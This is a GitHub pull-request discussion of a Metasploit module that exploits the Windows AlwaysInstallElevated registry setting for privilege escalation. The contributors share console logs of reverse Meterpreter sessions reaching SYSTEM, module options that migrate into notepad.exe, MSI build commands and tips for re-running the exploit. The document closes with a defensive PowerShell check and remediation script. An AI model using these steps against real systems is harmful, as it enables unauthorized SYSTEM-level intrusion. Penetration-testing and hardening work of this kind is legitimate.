Windows Local Exploit AlwaysInstallElevated Registry Key #1099
Conversation

Quoted from the module description:

    (NT AUTHORITY\SYSTEM).

    The default MSI file is data/exploits/exec_payload.msi with the WiX source
    file under external/source/exploits/exec_payload_msi/exec_payload.wxs.
The WiX source is in external/source/exploits/exec_payload_msi/exec_payload.wxs if I'm right.
I fixed the description - probably after you started looking at the file though.
    msf exploit(always_install_elevated) > rexploit
    [*] Started reverse handler on 192.168.1.25:7777
    meterpreter > getuid

No success launching the exploit again. The description says: "The MSI may not execute successfully successive times." Any clue about how to make the exploit work again?
It's best to regenerate the MSI, as Windows thinks that it has already been installed and will do things like try and find the original MSI file or tell the user this product has already been installed. You'll also want to kill msiexec as it may give you an error saying an installation is already in progress.

    MSI (s) (18:08) [10:46:54:188]: Product: Foobar 1.0 -- Error 1316. A network error occurred while attempting to read from the file: C:\DOCUME

May benefit from setting LOG_FILE so you can see some feedback.

I'm going to stop generating a random name on the MSI file - the installer keeps looking for the first MSI file installed (which we've deleted), but appears to be happy to reinstall if we keep the same filename - this method is never going to be stealthy anyway...
Hi Meatballs1, thanks very much! Looks much better for me. Still, there is something I would like to point out. Even when exiting meterpreter, the payload.exe process will remain for a while, which makes successive exploit attempts unsuccessful until payload.exe finishes. I think the exploit looks a little better by adding the following 'InitialAutoRunScript' to 'DefaultOptions':

    'DefaultOptions' => {
      'WfsDelay' => 10,
      'EXITFUNC' => 'thread',
      'InitialAutoRunScript' => 'migrate -k -f'
    },

After that it can be launched successive times without waiting :) :

    msf exploit(handler) > use exploit/windows/local/always_install_elevated
    msf exploit(always_install_elevated) > set session 1
    session => 1
    msf exploit(always_install_elevated) > rexploit
    [*] Reloading module...
    [*] Started reverse handler on 192.168.1.129:4444
    [+] HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
    [+] HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
    [*] Uploading the MSI to C:\DOCUME~1\juan\LOCALS~1\Temp\exec_payload.msi ...
    [*] Uploading the Payload to C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe ...
    [*] Executing MSI...
    [*] Sending stage (752128 bytes) to 192.168.1.147
    [*] Meterpreter session 2 opened (192.168.1.129:4444 -> 192.168.1.147:1040) at 2012-11-28 16:34:41 +0100
    [*] Deleting MSI...
    [*] Deleting Payload...
    [-] stdapi_fs_delete_file: Operation failed: Access is denied.
    [-] Failed to delete payload C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe, this is expected if the exploit is successful, manual cleanup may be required.
    meterpreter > [*] Session ID 2 (192.168.1.129:4444 -> 192.168.1.147:1040) processing InitialAutoRunScript 'migrate -k -f'
    [*] Current server process: payload.exe (3532)
    [*] Spawning notepad.exe process to migrate to
    [+] Migrating to 3792
    [+] Successfully migrated to process
    [*] Killing original process with PID 3532
    [+] Successfully killed process with PID 3532
    meterpreter > exit
    [*] Shutting down Meterpreter...
    [*] 192.168.1.147 - Meterpreter session 2 closed.  Reason: User exit
    msf exploit(always_install_elevated) > rexploit
    [*] Reloading module...
    [*] Started reverse handler on 192.168.1.129:4444
    [+] HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
    [+] HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
    [*] Uploading the MSI to C:\DOCUME~1\juan\LOCALS~1\Temp\exec_payload.msi ...
    [*] Uploading the Payload to C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe ...
    [*] Executing MSI...
    [*] Sending stage (752128 bytes) to 192.168.1.147
    [*] Meterpreter session 3 opened (192.168.1.129:4444 -> 192.168.1.147:1041) at 2012-11-28 16:34:57 +0100
    [*] Deleting MSI...
    [*] Deleting Payload...
    [-] stdapi_fs_delete_file: Operation failed: Access is denied.
    [-] Failed to delete payload C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe, this is expected if the exploit is successful, manual cleanup may be required.
    meterpreter > [*] Session ID 3 (192.168.1.129:4444 -> 192.168.1.147:1041) processing InitialAutoRunScript 'migrate -k -f'
    [*] Current server process: payload.exe (172)
    [*] Spawning notepad.exe process to migrate to
    [+] Migrating to 1696
    meterpreter > getuid
    [+] Successfully migrated to process
    [*] Killing original process with PID 172
    [+] Successfully killed process with PID 172
    ^C[-] Error running command getuid: Interrupt
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter >

Anyway, even when it looks good for me, I would like @jlee-r7 to give it a last look and agree with merging. Once he agrees, I'll do the last cleanup :) Really thanks for your collaboration!
Yep, looks good to me, thanks for all the feedback and testing!
Okay, did a last test after a little cleanup, it is working:

    msf exploit(handler) > use exploit/windows/local/always_install_elevated
    msf exploit(always_install_elevated) > set SESSION 1
    SESSION => 1
    msf exploit(always_install_elevated) > rexploit
    [*] Reloading module...
    [*] Started reverse handler on 192.168.1.129:4444
    [+] HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
    [+] HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
    [*] Uploading the MSI to C:\DOCUME~1\juan\LOCALS~1\Temp\exec_payload.msi ...
    [*] Uploading the Payload to C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe ...
    [*] Executing MSI...
    [*] Sending stage (752128 bytes) to 192.168.1.147
    [*] Meterpreter session 2 opened (192.168.1.129:4444 -> 192.168.1.147:1046) at 2012-11-28 21:47:14 +0100
    [*] Deleting MSI...
    [*] Deleting Payload...
    [-] stdapi_fs_delete_file: Operation failed: Access is denied.
    [-] Failed to delete payload C:\DOCUME~1\juan\LOCALS~1\Temp\payload.exe, this is expected if the exploit is successful, manual cleanup may be required.
    meterpreter > [*] Session ID 2 (192.168.1.129:4444 -> 192.168.1.147:1046) processing InitialAutoRunScript 'migrate -k -f'
    [*] Current server process: payload.exe (3228)
    [*] Spawning notepad.exe process to migrate to
    [+] Migrating to 3320
    meterpreter > [+] Successfully migrated to process
    [*] Killing original process with PID 3228
    [+] Successfully killed process with PID 3228
    meterpreter > getpid
    Current pid: 3320
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > sysinfo
    Computer        : JUAN-C0DE875735
    OS              : Windows XP (Build 2600, Service Pack 3).
    Architecture    : x86
    System Language : en_US
    Meterpreter     : x86/win32
    meterpreter >

so merging! Really thanks @Meatballs1 for your contribution!
@jvazquez-r7 will you generate an MSI to be distributed with Metasploit, or will users have to generate their own?

@Meatballs1 an MSI has been generated to be distributed with Metasploit.
This module checks that the AlwaysInstallElevated registry key is set for the local machine and the current user. If so, it uploads and executes an MSI file and payload.exe. The MSI runs under the privileges of SYSTEM and will execute payload.exe when run.

Whilst it would have been nice to create this as a Local exploit, writing a library to create MSI files was a bit too much effort!

The MSI can be created using the WIX tool (http://wix.sourceforge.net) simply with

    candle exec_payload.wxs
    light exec_payload.wixobj
msf exploit(always_install_elevated) > check
[+] HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
[+] HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
[+] The target is vulnerable.
msf exploit(always_install_elevated) > exploit
[*] Started reverse handler on 192.168.1.25:5555
[+] HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
[+] HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is 1.
[*] Uploading the MSI to C:\DOCUME~1\norm\LOCALS~1\Temp\DTNMEUGg.msi ...
[*] Uploading the Payload to C:\DOCUME~1\norm\LOCALS~1\Temp\payload.exe ...
[*] Executing MSI...
[*] msiexec.exe /quiet /passive /n /package C:\DOCUME~1\norm\LOCALS~1\Temp\DTNMEUGg.msi
[*] Sending stage (752128 bytes) to 192.168.1.25
[*] Meterpreter session 3 opened (192.168.1.25:5555 -> 192.168.1.25:1395) at 2012-11-22 10:37:45 +0000
[*] Deleting MSI...
[*] Deleting Payload...
[-] stdapi_fs_delete_file: Operation failed: Access is denied.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
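The registry check that the module's `check` command performs, written out stand-alone in PowerShell as an added example (this is not code from the pull request or from Metasploit). It reads the two values the module prints above, reports in the same `[+]`/`[-]` style, and adds a remediation helper for the defensive side. The function names, the output wording and `Disable-AlwaysInstallElevated` are this example's own; the registry paths are the ones the module tests.

```powershell
# Added example, not from the pull request or the Metasploit module.
# Reads the two AlwaysInstallElevated values the module checks and reports
# whether the condition it exploits is present. The function names and the
# remediation helper are this example's own.

function Get-AlwaysInstallElevated {
    $subKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = @{}

    foreach ($drive in 'HKLM', 'HKCU') {
        $path = "${drive}:\$subKey"
        # A missing key or value means the policy is not configured, which
        # Windows Installer treats the same as 0, so report 0 instead of erroring.
        $value = 0
        $item = Get-ItemProperty -Path $path -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue
        if ($null -ne $item) { $value = [int]$item.AlwaysInstallElevated }
        $values[$drive] = $value
    }

    # The policy only takes effect when the machine AND the user value are
    # both 1; one of them alone is not enough, which is why the module tests both.
    New-Object PSObject -Property @{
        HKLM       = $values['HKLM']
        HKCU       = $values['HKCU']
        Vulnerable = ($values['HKLM'] -eq 1 -and $values['HKCU'] -eq 1)
    }
}

function Disable-AlwaysInstallElevated {
    # Sets both values to 0 where the policy key exists. Writing HKLM needs an
    # elevated shell. If the setting is delivered by a GPO ("Always install with
    # elevated privileges" under Administrative Templates > Windows Components >
    # Windows Installer, in both Computer and User Configuration), Group Policy
    # will put it back at the next refresh, so fix the GPO rather than the registry.
    foreach ($drive in 'HKLM', 'HKCU') {
        $path = "${drive}:\SOFTWARE\Policies\Microsoft\Windows\Installer"
        if (Test-Path $path) {
            Set-ItemProperty -Path $path -Name 'AlwaysInstallElevated' -Value 0 -Type DWord
        }
    }
}

# Report in the same style as the module's check output.
$state = Get-AlwaysInstallElevated
foreach ($drive in 'HKLM', 'HKCU') {
    $hive = if ($drive -eq 'HKLM') { 'HKEY_LOCAL_MACHINE' } else { 'HKEY_CURRENT_USER' }
    $mark = if ($state.$drive -eq 1) { '[+]' } else { '[-]' }
    Write-Host "$mark $hive\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated is $($state.$drive)."
}
if ($state.Vulnerable) {
    Write-Host '[+] The target is vulnerable.'
} else {
    Write-Host '[-] The target is not vulnerable.'
}
```

The check is read-only and works from an unprivileged shell, since both policy keys are readable by standard users; the classic command-line equivalent is `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated` followed by the same query against `HKCU`. Only the check is reproduced here; the MSI upload and execution that the module performs after a positive result is not.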